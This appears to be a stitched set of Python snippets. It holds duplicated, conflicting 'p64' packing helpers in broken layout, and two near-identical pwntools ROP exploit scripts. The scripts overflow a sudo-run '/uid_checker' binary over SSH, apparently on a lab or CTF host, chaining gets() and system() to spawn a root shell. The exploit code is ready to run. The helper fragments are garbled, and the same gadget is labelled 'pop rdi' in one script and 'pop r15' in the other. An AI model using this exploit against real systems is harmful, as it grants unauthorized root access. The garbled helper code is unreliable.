def __str__(self, count=1):
if self.rbp == 0:
self.rbp = count
payload = p64(self.addr)
payload += p64(0) + p64(self.rbp)
payload += p64(self.target)
payload += p64(self.edi) + p64(self.rsi)
payload += p64(self.rdx)
payload += p64(self.addr - 0x1a)
return payload
def p64(self, *a, **kw):
return self.send(packing.p64(*a, **kw))
def p64(self, address, data, *a, **kw): return self.write(address, packing.p64(data, *a, **kw)) def p32(self, address, data, *a, **kw): return self.write(address, packing.p32(data, *a, **kw))
def p64(self, address, data, *a, **kw):
"""Writes a 64-bit integer ``data`` to the specified ``address``"""
return self.write(address, packing.p64(data, *a, **kw))
#!/usr/bin/env python3
from pwn import cyclic
from pwnlib.tubes.ssh import ssh
from pwnlib.util.packing import p64
offset = 88
payload = cyclic(offset)
payload += p64(0x400803) # pop rdi; ret
payload += p64(0x601060) # [arg0] rdi = 6295648
payload += p64(0x4005b0)
payload += p64(0x400803) # pop rdi; ret
payload += p64(0x601060) # [arg0] rdi = 6295648
payload += p64(0x400570)
s = ssh(host='10.10.139.182', user='******')
p = s.process(['sudo', '/uid_checker'])
print(p.recv())
p.sendline(payload)
print(p.recv())
p.sendline("/bin/sh")
p.interactive()
from pwn import cyclic
from pwnlib.tubes.ssh import ssh
from pwnlib.util.packing import p64
offset = 88 # Found with ropstar
payload = cyclic(offset)
payload += p64(0x400803) # pop r15; ret
payload += p64(0x601060) # .bss
payload += p64(0x4005b0) # gets()
payload += p64(0x400803) # pop r15; ret
payload += p64(0x601060) # .bss
payload += p64(0x400570) # system()
s = ssh(host='10.10.202.250', user='******', keyfile='./id_rsa')
p = s.process(['sudo', '/uid_checker'])
print(p.recv())
p.sendline(payload)
print(p.recv())
p.sendline("/bin/sh")
p.interactive(prompt='')
